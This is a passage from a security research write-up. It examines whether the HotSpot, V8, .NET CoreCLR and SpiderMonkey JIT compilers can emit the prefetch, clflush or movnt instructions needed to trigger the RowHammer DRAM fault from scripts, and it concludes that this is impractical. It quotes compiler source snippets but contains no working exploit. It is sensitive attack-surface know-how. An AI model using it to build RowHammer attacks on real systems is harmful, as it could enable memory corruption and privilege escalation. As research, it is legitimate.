  From bottom to top, if we want to get prefetch instruction, we need the LIR_Op1, and its openrand is lir_prefetchr or lir_prefetchw in LIR. To achieve this, we need to invoke the GraphBuilder::append_unsafe_prefetch function in HIR. The function is called by GraphBuilder::try_inline_instrinsics function. As last we found if we invoke the prefetch* method in sun.misc.Unsafe, we can get it. So the Hotspot does support prefetch. It treats Unsafe.prefetchRead() and Unsafe.prefetchWrite() methods as intrinsics. The method would generate prefetch instruction in the machine code. But unfortunately, sun.misc.Unsafe in rt.jar dose not declare such methods. We have to modify rt.jar to trigger that. What a pity!

  In Hotspot, we also find the CLFLUSH instruction, when hotspot starts, it will generate a code stub

__ bind(flush_line);                         
__ clflush(Address(addr, 0));          //addr: address to flush 
__ addptr(addr, ICache::line_size);                                         
__ decrementl(lines);                   //lines: range to flush
__ jcc(Assembler::notZero, flush_line);

The code stub can be invoked in the last phase of C1 compiler.

// done
masm()->flush();             //invoke ICache flush  

It try to flush the cache that instruction stored.

void AbstractAssembler::flush() {
    sync();
            ICache::invalidate_range(addr_at(0), offset());
}

  Use this we can flush a range of address, but the problem is the address is uncontrollable, we cannot flush the address we wanted. And the compiler will spend much time, we cannot get enough CLFLUSH in 64ms.

c) Other Compiler

  C2 Compiler is different from C1 Compiler. C2 Compiler is highly optimizing bytecode compiler. Optimizations include global value numbering, conditional constant type propagation, constant folding, and global code motion and so on. We cannot generate prefetch, clflush, movnt* instruction directly.
  Shark Compiler is based on LLVM, we ignore it because it`s not the default compiler.

2.2 Chrome V8

  The V8 JavaScript Engine is an open source JavaScript engine developed by Google Chrome web browser. V8 compiles JavaScript to native machine code before executing it. V8 does not have interpreter, it translates JavaScript to AST (Abstract Syntax Tree), then walks the AST to generate machine codes.
  After research, we did not find clflush, movnt* instructions when V8 compile the JavaScript. We found prefetch instruction in a function.
  The function that generate prefetch is:

MemMoveFunction CreateMemMoveFunction() {

  __ prefetch(Operand(src, 0), 1);
  __ cmp(count, kSmallCopySize);    //kSmallCopySize=8
  __ j(below_equal, &small_size);  
  __ cmp(count, kMediumCopySize);   //kMediumCopySize=63
  __ j(below_equal, &medium_size);
  __ cmp(dst, src);
  __ j(above, &backward);

  This function is used to move memory, when the instruction buffer is not big enough to store the compiled code. V8 has to enlarge the buffer, at this time the instruction can be generated one time. It cannot be used to trigger RowHammer.

2.3 .NET CoreCLIR

  CoreCLR is the .NET Core Runtime. It includes RyuJIT, the .NET GC and many other components. RyuJIT is the JIT compiler in .NET CoreCLR. RyuJIT only defines some common x86 instructions (Figure 2.3) that do not include the instruction needed to trigger RowHammer.
  We found the prefetch instruction in .NET GC component, just as shown in Figure2.4 But unfortunately the prefetch is disable by default (Figure 2.5).

Figure 2.3

void gc_heap::relocate_survivor_helper (BYTE* plug, BYTE* plug_end)
{
    BYTE*  x = plug;
    while (x < plug_end)
    {
        size_t s = size (x);
        BYTE* next_obj = x + Align (s);
        Prefetch (next_obj);
        relocate_obj_helper (x, s);
        assert (s > 0);
        x = next_obj;
    }
}

Figure 2.4

//#define PREFETCH
#ifdef PREFETCH
__declspec(naked) void __fastcall Prefetch(void* addr)
{
   __asm {
       PREFETCHT0 [ECX]
        ret
    };
}
#else //PREFETCH
inline void Prefetch (void* addr)
{
    UNREFERENCED_PARAMETER(addr);
}
#endif //PREFETCH

Figure 2.5

2.4 Firfox SpiderMonkey

  SpiderMonkey provides JavaScript support for Mozilla Firefox, we didn’t find the instructions needed to trigger RowHammer in it.

0x03 Conclusion

  The purpose of our research is to trigger RowHammer through script languages. In order to improve the efficiency of the language, most of them has JIT compiler. We analyzed Hotspot, Chrome V8, .NET CoreCLR and SpiderMonkey to try to verify our idea. But finally we found it is hard to get what we want.

1) Trigger RowHammer is not easy, we only have 64ms. It means the number of irrelevant instructions must be very few. Otherwise the number of the wordline toggle on and off is not enough to trigger RowHammer.

2) The instruction we need is uncommon. The compiler does not generate these instructions directly.

3) In the view of JIT compiler developers, in order to cross-platform, JIT usually abstracts the instruction, and implements it on different platforms. So the abstracted instruction is as few as possible. Because more instructions means much more codes. In the source code we analyzed, only hotspot abstracts the prefetch instruction. JIT compiler always try to avoid a lot of instruction definitions. (There are some special cases where script languages use third-party JIT engine such as AsmJIT, the engine usually supports all instructions. But for now, most languages always build JIT dependently).

4) In our research, we found the instruction we need always generated to assistance JIT compile process. For example, using prefetch to increase the speed of data move, using clflush to flash cache to assure the execution of the code generated. Instructions are not translated from script directly, the RowHammer problem cannot be triggered due to the small amount and slow speed of the instruction generation.

Resources

  1. Google Project Zero
    http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
  2. Paper: Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors http://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf
  3. Source code
]]>